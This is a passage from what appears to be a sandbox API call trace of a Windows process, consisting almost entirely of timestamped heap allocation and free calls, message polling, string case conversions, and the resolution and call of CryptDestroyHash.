hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0207.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0207.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0207.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0207.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0207.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0207.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0207.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0207.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0207.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0207.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0207.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0207.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0207.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0207.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0207.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0207.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0207.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0207.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0207.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0207.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0207.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0207.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0207.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0207.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0207.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0207.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0207.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0207.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0207.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0207.345] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0207.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0207.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0207.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0207.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0207.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.346] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0207.346] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0207.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0207.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0207.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0207.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0207.346] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0207.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0207.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0207.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0207.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0207.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0207.347] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0207.347] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0207.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0207.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0207.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0207.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0207.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0207.348] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0207.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.348] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0207.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0207.348] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0207.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0207.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0207.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0207.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0207.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.348] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0207.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0207.348] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0207.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0207.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0207.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0207.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0207.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0207.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0207.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0207.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.349] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0207.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0207.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0207.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0207.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0207.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0207.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466e10, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0207.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0207.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0207.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0207.350] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0207.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0207.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0207.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0207.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0207.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0207.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0207.351] CryptDestroyHash (hHash=0xaa5820) returned 1 [0207.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0207.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0207.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0207.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0207.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0207.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0207.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0207.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0207.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0207.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0207.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0207.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0207.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0207.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0207.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0207.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0207.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0207.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0207.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0207.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0207.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0207.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0207.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0207.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0207.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0207.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0207.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0207.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0207.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0207.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0207.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0207.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0207.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0207.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0207.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0207.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0207.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0207.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0207.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0207.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0207.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0207.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0207.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0207.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0207.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0207.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0207.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0207.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0207.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0207.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.354] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0207.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0207.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0207.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0207.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0207.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0207.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0207.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0207.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.354] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0207.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0207.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0207.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0207.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0207.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0207.355] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0207.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0207.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0207.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0207.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0207.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0207.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0207.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0207.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0207.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0207.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0207.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 